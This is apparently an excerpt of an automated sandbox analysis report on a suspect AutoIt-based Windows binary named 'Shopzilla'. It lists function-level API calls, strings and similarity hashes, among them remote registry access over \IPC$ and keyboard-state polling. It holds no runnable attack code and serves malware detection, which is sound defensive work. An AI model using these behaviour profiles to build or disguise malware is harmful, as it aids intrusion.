                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                              • String ID:
                                              • API String ID: 1500180987-0
                                              • Opcode ID: 0443f03af4a7bce75803076f2b79a2356331623dda18e8a28b8488ed363e5068
                                              • Instruction ID: 299efb725f6bb4b2540e9a68e07494955932b6bbca8d94729cb75d2d41096491
                                              • Opcode Fuzzy Hash: 0443f03af4a7bce75803076f2b79a2356331623dda18e8a28b8488ed363e5068
                                              • Instruction Fuzzy Hash: A1C1FAB1900219ABDF21DF95CC85BDEB7BDEF45310F0040AAF609E6192EB719A84CF65
                                              APIs
                                              • _memset.LIBCMT ref: 00BB5BF1
                                              • GetMenuItemCount.USER32(00C66890), ref: 00BF0DFB
                                              • GetMenuItemCount.USER32(00C66890), ref: 00BF0EAB
                                              • GetCursorPos.USER32(?), ref: 00BF0EEF
                                              • SetForegroundWindow.USER32(00000000), ref: 00BF0EF8
                                              • TrackPopupMenuEx.USER32(00C66890,00000000,?,00000000,00000000,00000000), ref: 00BF0F0B
                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00BF0F17
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                              • String ID:
                                              • API String ID: 2751501086-0
                                              • Opcode ID: 274e59cee696ac3c31b283619031e7099891f84f728ed35c186a7a910bb62320
                                              • Instruction ID: 7961bee5cc9675efb6c8634ec8160fbb32f0d13a3852ac0211cb35dcf7056b28
                                              • Opcode Fuzzy Hash: 274e59cee696ac3c31b283619031e7099891f84f728ed35c186a7a910bb62320
                                              • Instruction Fuzzy Hash: 30711175610609BFFB20AB54CC89FBABFA5FF04724F204256FA14671E2C7B06814DB91
                                              APIs
                                                • Part of subcall function 00BB1821: _memmove.LIBCMT ref: 00BB185B
                                              • _memset.LIBCMT ref: 00BF826C
                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00BF82A1
                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00BF82BD
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00BF82D9
                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00BF8303
                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00BF832B
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00BF8336
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00BF833B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                              • API String ID: 1411258926-22481851
                                              • Opcode ID: c4aa1ab7f48c3f18034dc7c84a83362f9f926daa6af31251cc32a735e7f73184
                                              • Instruction ID: 672a3eaf80f4e833ea8b94a6a3e26c3c106b68390788a4c81649d51a9d0fd6b9
                                              • Opcode Fuzzy Hash: c4aa1ab7f48c3f18034dc7c84a83362f9f926daa6af31251cc32a735e7f73184
                                              • Instruction Fuzzy Hash: 78410776C1022CABCF15EBA4DCA5AFEB7B8FF04740B4045A9F901A7161DA705D49CB90
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C201D5,?,?), ref: 00C21259
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                              • API String ID: 3964851224-909552448
                                              • Opcode ID: b211b2ebfb71978b274960a0f2f34b70e269f1bd6cf1986b0a43adbd940db328
                                              • Instruction ID: 6c9f4949625ec2eb1cb3163398cf6e487ab3f030d3d61ccf93d6a5d5b79d72d8
                                              • Opcode Fuzzy Hash: b211b2ebfb71978b274960a0f2f34b70e269f1bd6cf1986b0a43adbd940db328
                                              • Instruction Fuzzy Hash: AD417C7411021A8BCF04EF50E851AFE37A5FF61304F844698FD664BAA2DBB0DE59CB61
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00BEFAC1,00000010,?,Bad directive syntax error,00C30980,00000000,?,?,?), ref: 00BFFD60
                                              • LoadStringW.USER32(00000000,?,00BEFAC1,00000010), ref: 00BFFD67
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                              • _wprintf.LIBCMT ref: 00BFFD9A
                                              • __swprintf.LIBCMT ref: 00BFFDBC
                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00BFFE2B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                              • API String ID: 1506413516-4153970271
                                              • Opcode ID: 491d198ec25226fe7f341d0339d8bb437eb3c6064a647766590391d058dad2a8
                                              • Instruction ID: f766320aab50f32f0904e5097b6b2deff83e864079955bd403db72836bb7cc94
                                              • Opcode Fuzzy Hash: 491d198ec25226fe7f341d0339d8bb437eb3c6064a647766590391d058dad2a8
                                              • Instruction Fuzzy Hash: BF21507280021EABCF11AF94CC6AFFE77B9FF14300F4448A5F515620A1DA71AA68DB10
                                              APIs
                                                • Part of subcall function 00BB1821: _memmove.LIBCMT ref: 00BB185B
                                                • Part of subcall function 00BB153B: _memmove.LIBCMT ref: 00BB15C4
                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C05758
                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C0576E
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C0577F
                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C05791
                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C057A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: SendString$_memmove
                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                              • API String ID: 2279737902-1007645807
                                              • Opcode ID: 141fb5d75f78be0479db9b09281b23dee4258b3c8c32fdfe2adff32548432f3d
                                              • Instruction ID: 673aa4bdabfea682bba9ce58cae4bf343218eebd53729af6bff8487f1fd40808
                                              • Opcode Fuzzy Hash: 141fb5d75f78be0479db9b09281b23dee4258b3c8c32fdfe2adff32548432f3d
                                              • Instruction Fuzzy Hash: 4211C874950119BADB20A769DC69DFF7BBCEFE1B40F4008B9B811A20D1DEB01D49C9B0
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                              • String ID: 0.0.0.0
                                              • API String ID: 208665112-3771769585
                                              • Opcode ID: f510040dd344aac97b5e94e547f984ba9f8aa7bdb1061fa6f8b6520af53c4693
                                              • Instruction ID: f34d42720db4ef148e1fc9ab9d734b20e8ab1e52c7a644afe62d68d8ab8ec30b
                                              • Opcode Fuzzy Hash: f510040dd344aac97b5e94e547f984ba9f8aa7bdb1061fa6f8b6520af53c4693
                                              • Instruction Fuzzy Hash: 4711E772914208ABCB28B7619C46FDF7BBCDF41711F1401A9F505A60D2EF70DA81DA91
                                              APIs
                                              • timeGetTime.WINMM ref: 00C053A2
                                                • Part of subcall function 00BC074E: timeGetTime.WINMM(?,00000002,00BAC22C), ref: 00BC0752
                                              • Sleep.KERNEL32(0000000A), ref: 00C053CE
                                              • EnumThreadWindows.USER32(?,Function_00065350,00000000), ref: 00C053F2
                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C05414
                                              • SetActiveWindow.USER32 ref: 00C05433
                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C05441
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C05460
                                              • Sleep.KERNEL32(000000FA), ref: 00C0546B
                                              • IsWindow.USER32 ref: 00C05477
                                              • EndDialog.USER32(00000000), ref: 00C05488
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                              • String ID: BUTTON
                                              • API String ID: 1194449130-3405671355
                                              • Opcode ID: 6b6781c5d57f463ba7dbbb62e78af436121ed8d274abb247f9f9f4ab3ce902f4
                                              • Instruction ID: f1b6b7b53c4137cc8ca2e6492176c6e592543f98a65562ac63018d22827a828f
                                              • Opcode Fuzzy Hash: 6b6781c5d57f463ba7dbbb62e78af436121ed8d274abb247f9f9f4ab3ce902f4
                                              • Instruction Fuzzy Hash: 5121A171204A09AFE7215B61ED99B3F3B6DEB4434EF201954F512821F1CBB18D50DF62
                                              APIs
                                                • Part of subcall function 00BA4D37: __itow.LIBCMT ref: 00BA4D62
                                                • Part of subcall function 00BA4D37: __swprintf.LIBCMT ref: 00BA4DAC
                                              • CoInitialize.OLE32(00000000), ref: 00C0DA9A
                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C0DB2D
                                              • SHGetDesktopFolder.SHELL32(?), ref: 00C0DB41
                                              • CoCreateInstance.OLE32(00C33D4C,00000000,00000001,00C59BEC,?), ref: 00C0DB8D
                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C0DBFC
                                              • CoTaskMemFree.OLE32(?,?), ref: 00C0DC54
                                              • _memset.LIBCMT ref: 00C0DC91
                                              • SHBrowseForFolderW.SHELL32(?), ref: 00C0DCCD
                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C0DCF0
                                              • CoTaskMemFree.OLE32(00000000), ref: 00C0DCF7
                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C0DD2E
                                              • CoUninitialize.OLE32(00000001,00000000), ref: 00C0DD30
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                              • String ID:
                                              • API String ID: 1246142700-0
                                              • Opcode ID: a6856c80b4af372e24fe53e45bbf4ff1ddfb915821654ba9134a5fc688d6c5aa
                                              • Instruction ID: 1bfcdcf2ea1dbc6f9049c61ab846f16ecf129b5f0bc50c003117394b66b77f83
                                              • Opcode Fuzzy Hash: a6856c80b4af372e24fe53e45bbf4ff1ddfb915821654ba9134a5fc688d6c5aa
                                              • Instruction Fuzzy Hash: DDB1FD75A00109AFDB14DFA4C898EAEBBF9FF49304B148499F906EB251DB70EE45CB50
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00C00702
                                              • SetKeyboardState.USER32(?), ref: 00C0076D
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00C0078D
                                              • GetKeyState.USER32(000000A0), ref: 00C007A4
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00C007D3
                                              • GetKeyState.USER32(000000A1), ref: 00C007E4
                                              • GetAsyncKeyState.USER32(00000011), ref: 00C00810
                                              • GetKeyState.USER32(00000011), ref: 00C0081E
                                              • GetAsyncKeyState.USER32(00000012), ref: 00C00847
                                              • GetKeyState.USER32(00000012), ref: 00C00855
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00C0087E
                                              • GetKeyState.USER32(0000005B), ref: 00C0088C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: 6baf29e255482475177ed557769655f395829da9ee0930e019f90f5a5b5fe2ca
                                              • Instruction ID: 51bb697c731d5e484de99327456b61da015e611a90a6fa48ab1fec026e472755
                                              • Opcode Fuzzy Hash: 6baf29e255482475177ed557769655f395829da9ee0930e019f90f5a5b5fe2ca
                                              • Instruction Fuzzy Hash: 3051E830A0478829FB34E7B084157ABFFB59F01340F19869E99D6571C3DA64AB8CCBA1
                                              APIs
                                              • GetDlgItem.USER32(?,00000001), ref: 00BFCBFF
                                              • GetWindowRect.USER32(00000000,?), ref: 00BFCC11
                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00BFCC6F
                                              • GetDlgItem.USER32(?,00000002), ref: 00BFCC7A
                                              • GetWindowRect.USER32(00000000,?), ref: 00BFCC8C
                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00BFCCE0
                                              • GetDlgItem.USER32(?,000003E9), ref: 00BFCCEE
                                              • GetWindowRect.USER32(00000000,?), ref: 00BFCCFF
                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00BFCD42
                                              • GetDlgItem.USER32(?,000003EA), ref: 00BFCD50
                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00BFCD6D
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00BFCD7A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$ItemMoveRect$Invalidate
                                              • String ID:
                                              • API String ID: 3096461208-0
                                              • Opcode ID: e27035cce0bc1590ae134fe22a4db1e9c293b5f4239824f073ac9c4e0a133971
                                              • Instruction ID: 3b75875c36db561991e879ad7e7bf62290116d264f064c371f85f4ad574e0ff6
                                              • Opcode Fuzzy Hash: e27035cce0bc1590ae134fe22a4db1e9c293b5f4239824f073ac9c4e0a133971
                                              • Instruction Fuzzy Hash: 9B518371B10209AFDB18CF68CD99BAEBBF6EB88310F24816DF615D7290D770AD448B50
                                              APIs
                                                • Part of subcall function 00BA1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BA2412,?,00000000,?,?,?,?,00BA1AA7,00000000,?), ref: 00BA1F76
                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00BA24AF
                                              • KillTimer.USER32(-00000001,?,?,?,?,00BA1AA7,00000000,?,?,00BA1EBE,?,?), ref: 00BA254A
                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00BDBF17
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BA1AA7,00000000,?,?,00BA1EBE,?,?), ref: 00BDBF48
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BA1AA7,00000000,?,?,00BA1EBE,?,?), ref: 00BDBF5F
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BA1AA7,00000000,?,?,00BA1EBE,?,?), ref: 00BDBF7B
                                              • DeleteObject.GDI32(00000000), ref: 00BDBF8D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                              • String ID:
                                              • API String ID: 641708696-0
                                              • Opcode ID: 5398f5e522fd6a0301df6dc6fcc68a9a965f614aecc25cd3b302c745ee0b4a86
                                              • Instruction ID: d3ae052b363f8d815592d2b283a246b010442fa5e9af12bbac120b4a629940af
                                              • Opcode Fuzzy Hash: 5398f5e522fd6a0301df6dc6fcc68a9a965f614aecc25cd3b302c745ee0b4a86
                                              • Instruction Fuzzy Hash: FB61BC31518601DFDB359F29CD98B2EBBF1FB4A316F1085ADE54247AA0CB71A890DF90
                                              APIs
                                                • Part of subcall function 00BA29AB: GetWindowLongW.USER32(?,000000EB), ref: 00BA29BC
                                              • GetSysColor.USER32(0000000F), ref: 00BA25AF
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ColorLongWindow
                                              • String ID:
                                              • API String ID: 259745315-0
                                              • Opcode ID: 688683b699f7192063bfe6ab66134e15e172c4bbcc4cd34d6ccbc5b1b44adf5e
                                              • Instruction ID: 556eaa383495cab76d9a3695d0b5ff2c3d23591079b63fdaf4e412b6afbf9f61
                                              • Opcode Fuzzy Hash: 688683b699f7192063bfe6ab66134e15e172c4bbcc4cd34d6ccbc5b1b44adf5e
                                              • Instruction Fuzzy Hash: B041C331009110AFDB255F2C9C98BBD3BB5EB0B331F2942A5FD658A2E6D7308C41EB61
                                              APIs
                                                • Part of subcall function 00BC0AB6: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00BB2A3E,?,00008000), ref: 00BC0AD2
                                                • Part of subcall function 00BC01AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB2A58,?,00008000), ref: 00BC01CF
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BB2ADF
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB2C2C
                                                • Part of subcall function 00BB3EBE: _wcscpy.LIBCMT ref: 00BB3EF6
                                                • Part of subcall function 00BC379F: _iswctype.LIBCMT ref: 00BC37A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                              • API String ID: 537147316-3738523708
                                              • Opcode ID: b37f4e5cfdba6411090cc24a9235d0f72af8f90a05d80076c1a14c0b3ea0b780
                                              • Instruction ID: 807483e80d62bab8524120641007d8d1c33fb763a323e1d4a439adef2d23c276
                                              • Opcode Fuzzy Hash: b37f4e5cfdba6411090cc24a9235d0f72af8f90a05d80076c1a14c0b3ea0b780
                                              • Instruction Fuzzy Hash: 2A02BF705083419FC724EF24C891ABFBBE5EF89314F1049ADF499972A2DB70DA49CB52
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,00C30980), ref: 00C0ADBB
                                              • GetDriveTypeW.KERNEL32(00000061,00C59970,00000061), ref: 00C0AE85
                                              • _wcscpy.LIBCMT ref: 00C0AEAF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
